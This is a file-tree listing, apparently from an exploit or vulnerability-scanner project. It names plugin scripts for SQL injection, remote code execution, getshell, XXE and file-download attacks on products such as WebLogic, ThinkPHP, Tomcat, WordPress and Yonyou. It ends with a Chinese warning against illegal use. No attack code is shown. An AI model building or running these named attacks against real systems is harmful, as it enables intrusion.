│ shopnum_GuidBuyList_sqli.cpython-37.pyc
│ shopnum_ProductDetail_sqli.cpython-37.pyc
│ shopnum_ProductListCategory_sqli.cpython-37.pyc
│ shopnum_ShoppingCart1_sqli.cpython-37.pyc
│ ShoppingCart1_sqli.cpython-37.pyc
│
├─siteengine
│ │ comments_module_sqli.py
│ │
│ └─__pycache__
│ comments_module_sqli.cpython-37.pyc
│ siteengine_comments_module_sqli.cpython-37.pyc
│
├─siteserver
│ │ background_administrator_sqli.py
│ │ background_keywordsFilting_sqli.py
│ │ background_log_sqli.py
│ │ background_taskLog_sqli.py
│ │ UserNameCollection_sqli.py
│ │
│ └─__pycache__
│ background_administrator_sqli.cpython-37.pyc
│ background_keywordsFilting_sqli.cpython-37.pyc
│ background_log_sqli.cpython-37.pyc
│ background_taskLog_sqli.cpython-37.pyc
│ siteserver_background_administrator_sqli.cpython-37.pyc
│ siteserver_background_keywordsFilting_sqli.cpython-37.pyc
│ siteserver_background_log_sqli.cpython-37.pyc
│ siteserver_background_taskLog_sqli.cpython-37.pyc
│ siteserver_UserNameCollection_sqli.cpython-37.pyc
│ UserNameCollection_sqli.cpython-37.pyc
│
├─smartoa
│ │ multi_filedownload.py
│ │
│ └─__pycache__
│ multi_filedownload.cpython-37.pyc
│ smartoa_multi_filedownload.cpython-37.pyc
│
├─smtp
│ │ starttls_plaintext_inj.py
│ │
│ └─__pycache__
│ smtp_starttls_plaintext_inj.cpython-37.pyc
│ starttls_plaintext_inj.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─speedcms
│ │ list_cid_sqli.py
│ │
│ └─__pycache__
│ list_cid_sqli.cpython-37.pyc
│ speedcms_list_cid_sqli.cpython-37.pyc
│
├─srun
│ │ download_file_filedownload.py
│ │ index_file_filedownload.py
│ │ rad_online_bypass_rce.py
│ │ rad_online_username_rce.py
│ │ user_info_uid_rce.py
│ │
│ └─__pycache__
│ download_file_filedownload.cpython-37.pyc
│ index_file_filedownload.cpython-37.pyc
│ rad_online_bypass_rce.cpython-37.pyc
│ rad_online_username_rce.cpython-37.pyc
│ srun_download_file_filedownload.cpython-37.pyc
│ srun_index_file_filedownload.cpython-37.pyc
│ srun_rad_online_bypass_rce.cpython-37.pyc
│ srun_rad_online_username_rce.cpython-37.pyc
│ srun_user_info_uid_rce.cpython-37.pyc
│ user_info_uid_rce.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─tcexam
│ │ reinstall_getshell.py
│ │
│ └─__pycache__
│ reinstall_getshell.cpython-37.pyc
│ tcexam_reinstall_getshell.cpython-37.pyc
│
├─thinkphp
│ │ code_exec.py
│ │ onethink_category_sqli.py
│ │ v5x_code_exec.py
│ │
│ └─__pycache__
│ code_exec.cpython-37.pyc
│ onethink_category_sqli.cpython-37.pyc
│ thinkphp_code_exec.cpython-37.pyc
│ thinkphp_v5x_code_exec.cpython-37.pyc
│ thinkphp_v5x_code_exec_1.cpython-37.pyc
│ thinkphp_v5x_code_exec_2.cpython-37.pyc
│ thinkphp_v5_exec.cpython-37.pyc
│ v5x_code_exec.cpython-37.pyc
│
├─thinksns
│ │ category_code_exec.py
│ │
│ └─__pycache__
│ category_code_exec.cpython-37.pyc
│ thinksns_category_code_exec.cpython-37.pyc
│
├─tomcat
│ │ put_exec.py
│ │
│ └─__pycache__
│ put_exec.cpython-37.pyc
│ tomcat_put_exec.cpython-37.pyc
│ tomcat_weak_pass.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─topsec
│ │ change_lan_filedownload.py
│ │
│ └─__pycache__
│ change_lan_filedownload.cpython-37.pyc
│ topsec_change_lan_filedownload.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─trs
│ │ ids_auth_disclosure.py
│ │ infogate_register.py
│ │ infogate_xxe.py
│ │ inforadar_disclosure.py
│ │ lunwen_papercon_sqli.py
│ │ was40_passwd_disclosure.py
│ │ was40_tree_disclosure.py
│ │ was5_config_disclosure.py
│ │ was5_download_templet.py
│ │ wcm_default_user.py
│ │ wcm_infoview_disclosure.py
│ │ wcm_pre_as_lfi.py
│ │ wcm_service_writefile.py
│ │
│ └─__pycache__
│ ids_auth_disclosure.cpython-37.pyc
│ infogate_register.cpython-37.pyc
│ infogate_xxe.cpython-37.pyc
│ inforadar_disclosure.cpython-37.pyc
│ lunwen_papercon_sqli.cpython-37.pyc
│ trs_ids_auth_disclosure.cpython-37.pyc
│ trs_infogate_register.cpython-37.pyc
│ trs_infogate_xxe.cpython-37.pyc
│ trs_inforadar_disclosure.cpython-37.pyc
│ trs_lunwen_papercon_sqli.cpython-37.pyc
│ trs_was40_passwd_disclosure.cpython-37.pyc
│ trs_was40_tree_disclosure.cpython-37.pyc
│ trs_was5_config_disclosure.cpython-37.pyc
│ trs_was5_download_templet.cpython-37.pyc
│ trs_wcm_default_user.cpython-37.pyc
│ trs_wcm_infoview_disclosure.cpython-37.pyc
│ trs_wcm_pre_as_lfi.cpython-37.pyc
│ trs_wcm_service_writefile.cpython-37.pyc
│ was40_passwd_disclosure.cpython-37.pyc
│ was40_tree_disclosure.cpython-37.pyc
│ was5_config_disclosure.cpython-37.pyc
│ was5_download_templet.cpython-37.pyc
│ wcm_default_user.cpython-37.pyc
│ wcm_infoview_disclosure.cpython-37.pyc
│ wcm_pre_as_lfi.cpython-37.pyc
│ wcm_service_writefile.cpython-37.pyc
│
├─typecho
│ │ install_code_exec.py
│ │
│ └─__pycache__
│ install_code_exec.cpython-37.pyc
│ typecho_install_code_exec.cpython-37.pyc
│
├─umail
│ │ physical_path.py
│ │ sessionid_access.py
│ │
│ └─__pycache__
│ physical_path.cpython-37.pyc
│ sessionid_access.cpython-37.pyc
│ umail_physical_path.cpython-37.pyc
│ umail_sessionid_access.cpython-37.pyc
│
├─urp
│ │ query.py
│ │ query2.py
│ │ ReadJavaScriptServlet_fileread.py
│ │
│ └─__pycache__
│ query.cpython-37.pyc
│ query2.cpython-37.pyc
│ ReadJavaScriptServlet_fileread.cpython-37.pyc
│ urp_query.cpython-37.pyc
│ urp_query2.cpython-37.pyc
│ urp_ReadJavaScriptServlet_fileread.cpython-37.pyc
│
├─v2tech
│ │ v2Conference_sqli_xxe.py
│ │
│ └─__pycache__
│ v2Conference_sqli_xxe.cpython-37.pyc
│
├─viewgood
│ │ pic_proxy_sqli.py
│ │ two_sqli.py
│ │ viewgood_GetCaption_sqli.py
│ │
│ └─__pycache__
│ pic_proxy_sqli.cpython-37.pyc
│ two_sqli.cpython-37.pyc
│ viewgood_GetCaption_sqli.cpython-37.pyc
│ viewgood_pic_proxy_sqli.cpython-37.pyc
│ viewgood_two_sqli.cpython-37.pyc
│
├─weaver_oa
│ │ code_exec.py
│ │ db_disclosure.py
│ │ download_sqli.py
│ │ filedownload.py
│ │
│ └─__pycache__
│ code_exec.cpython-37.pyc
│ db_disclosure.cpython-37.pyc
│ download_sqli.cpython-37.pyc
│ filedownload.cpython-37.pyc
│ weaver_oa_db_disclosure.cpython-37.pyc
│ weaver_oa_download_sqli.cpython-37.pyc
│ weaver_oa_filedownload.cpython-37.pyc
│
├─weblogic
│ │ interface_disclosure.py
│ │ ssrf.py
│ │ weak_pass.py
│ │ weblogic_CVE_2018_2628.py
│ │ ws_utc_xxe.py
│ │ xmldecoder_exec.py
│ │
│ └─__pycache__
│ interface_disclosure.cpython-37.pyc
│ ssrf.cpython-37.pyc
│ weak_pass.cpython-37.pyc
│ weblogic_CVE_2018_2628.cpython-37.pyc
│ weblogic_interface_disclosure.cpython-37.pyc
│ weblogic_ssrf.cpython-37.pyc
│ weblogic_weak_pass.cpython-37.pyc
│ weblogic_ws_utc_xxe.cpython-37.pyc
│ weblogic_xmldecoder_exec.cpython-37.pyc
│ ws_utc_xxe.cpython-37.pyc
│ xmldecoder_exec.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─wecenter
│ │ topic_id_sqli.py
│ │
│ └─__pycache__
│ topic_id_sqli.cpython-37.pyc
│ wecenter_topic_id_sqli.cpython-37.pyc
│
├─weway
│ │ PictureView1_filedownload.py
│ │
│ └─__pycache__
│ PictureView1_filedownload.cpython-37.pyc
│ weway_PictureView1_filedownload.cpython-37.pyc
│
├─wizbank
│ │ download_filedownload.py
│ │ usr_id_sqli.py
│ │
│ └─__pycache__
│ download_filedownload.cpython-37.pyc
│ usr_id_sqli.cpython-37.pyc
│ wizbank_download_filedownload.cpython-37.pyc
│ wizbank_usr_id_sqli.cpython-37.pyc
│
├─wordpress
│ │ admin_ajax_filedownload.py
│ │ display_widgets_backdoor.py
│ │ plugin_azonpop_sqli.py
│ │ plugin_mailpress_rce.py
│ │ plugin_ShortCode_lfi.py
│ │ restapi_sqli.py
│ │ url_redirect.py
│ │ woocommerce_code_exec.py
│ │
│ └─__pycache__
│ admin_ajax_filedownload.cpython-37.pyc
│ display_widgets_backdoor.cpython-37.pyc
│ plugin_azonpop_sqli.cpython-37.pyc
│ plugin_mailpress_rce.cpython-37.pyc
│ plugin_ShortCode_lfi.cpython-37.pyc
│ restapi_sqli.cpython-37.pyc
│ url_redirect.cpython-37.pyc
│ woocommerce_code_exec.cpython-37.pyc
│ wordpress_admin_ajax_filedownload.cpython-37.pyc
│ wordpress_display_widgets_backdoor.cpython-37.pyc
│ wordpress_plugin_azonpop_sqli.cpython-37.pyc
│ wordpress_plugin_mailpress_rce.cpython-37.pyc
│ wordpress_plugin_ShortCode_lfi.cpython-37.pyc
│ wordpress_restapi_sqli.cpython-37.pyc
│ wordpress_url_redirect.cpython-37.pyc
│ wordpress_woocommerce_code_exec.cpython-37.pyc
│
├─xplus
│ │ mysql_mssql_sqli.py
│ │ v2003_getshell.py
│ │
│ └─__pycache__
│ mysql_mssql_sqli.cpython-37.pyc
│ v2003_getshell.cpython-37.pyc
│ xplus_2003_getshell.cpython-37.pyc
│ xplus_mysql_mssql_sqli.cpython-37.pyc
│
├─yonyou
│ │ a8_CmxUser_sqli.py
│ │ a8_getshell.py
│ │ a8_logs_disclosure.py
│ │ a8_personService_xxe.py
│ │ cm_info_content_sqli.py
│ │ createMysql_disclosure.py
│ │ ehr_ELTextFile.py
│ │ ehr_resetpwd_sqli.py
│ │ fe_treeXml_sqli.py
│ │ getemaildata_fileread.py
│ │ icc_struts2.py
│ │ initData_disclosure.py
│ │ multi_union_sqli.py
│ │ nc_NCFindWeb_fileread.py
│ │ status_default_pwd.py
│ │ test_sqli.py
│ │ user_ids_sqli.py
│ │ yonyou_nc_Unauthorized.py
│ │
│ └─__pycache__
│ a8_CmxUser_sqli.cpython-37.pyc
│ a8_getshell.cpython-37.pyc
│ a8_logs_disclosure.cpython-37.pyc
│ a8_personService_xxe.cpython-37.pyc
│ cm_info_content_sqli.cpython-37.pyc
│ createMysql_disclosure.cpython-37.pyc
│ ehr_ELTextFile.cpython-37.pyc
│ ehr_resetpwd_sqli.cpython-37.pyc
│ fe_treeXml_sqli.cpython-37.pyc
│ getemaildata_fileread.cpython-37.pyc
│ icc_struts2.cpython-37.pyc
│ initData_disclosure.cpython-37.pyc
│ multi_union_sqli.cpython-37.pyc
│ nc_NCFindWeb_fileread.cpython-37.pyc
│ status_default_pwd.cpython-37.pyc
│ test_sqli.cpython-37.pyc
│ u8_CmxItem.cpython-37.pyc
│ u8_CmxItem_sqli.cpython-37.pyc
│ user_ids_sqli.cpython-37.pyc
│ yonyou_a8_CmxUser_sqli.cpython-37.pyc
│ yonyou_a8_logs_disclosure.cpython-37.pyc
│ yonyou_a8_personService_xxe.cpython-37.pyc
│ yonyou_cm_info_content_sqli.cpython-37.pyc
│ yonyou_createMysql_disclosure.cpython-37.pyc
│ yonyou_ehr_ELTextFile.cpython-37.pyc
│ yonyou_ehr_resetpwd_sqli.cpython-37.pyc
│ yonyou_fe_treeXml_sqli.cpython-37.pyc
│ yonyou_getemaildata_fileread.cpython-37.pyc
│ yonyou_icc_struts2.cpython-37.pyc
│ yonyou_initData_disclosure.cpython-37.pyc
│ yonyou_multi_union_sqli.cpython-37.pyc
│ yonyou_nc_NCFindWeb_fileread.cpython-37.pyc
│ yonyou_nc_Unauthorized.cpython-37.pyc
│ yonyou_status_default_pwd.cpython-37.pyc
│ yonyou_test_sqli.cpython-37.pyc
│ yonyou_u8_CmxItem_sqli.cpython-37.pyc
│ yonyou_user_ids_sqli.cpython-37.pyc
│
├─zabbix
│ │ jsrpc_profileIdx2_sqli.py
│ │
│ └─__pycache__
│ jsrpc_profileIdx2_sqli.cpython-37.pyc
│ zabbix_jsrpc_profileIdx2_sqli.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─zfsoft
│ │ database_control.py
│ │ default3_bruteforce.py
│ │
│ ├─xml
│ │ zfsoft_service_stryhm_sqli_false.xml
│ │ zfsoft_service_stryhm_sqli_true.xml
│ │
│ └─__pycache__
│ database_control.cpython-37.pyc
│ default3_bruteforce.cpython-37.pyc
│ service_stryhm_sqli.cpython-37.pyc
│ zfsoft_database_control.cpython-37.pyc
│ zfsoft_default3_bruteforce.cpython-37.pyc
│ zfsoft_service_stryhm_sqli.cpython-37.pyc
│
├─zookeeper
│ │ unauth.py
│ │
│ └─__pycache__
│ unauth.cpython-37.pyc
│ zookeeper_unauth.cpython-37.pyc
│ __init__.cpython-37.pyc
│
├─zuitu
│ │ coupon_id_sqli.py
│ │
│ └─__pycache__
│ coupon_id_sqli.cpython-37.pyc
│ zuitu_coupon_id_sqli.cpython-37.pyc
│
└─__pycache__
cmsmain.cpython-37.pyc
Plugins.cpython-37.pyc
systemmain.cpython-37.pyc
__init__.cpython-37.pyc警告!
请勿用于非法用途!否则自行承担一切后果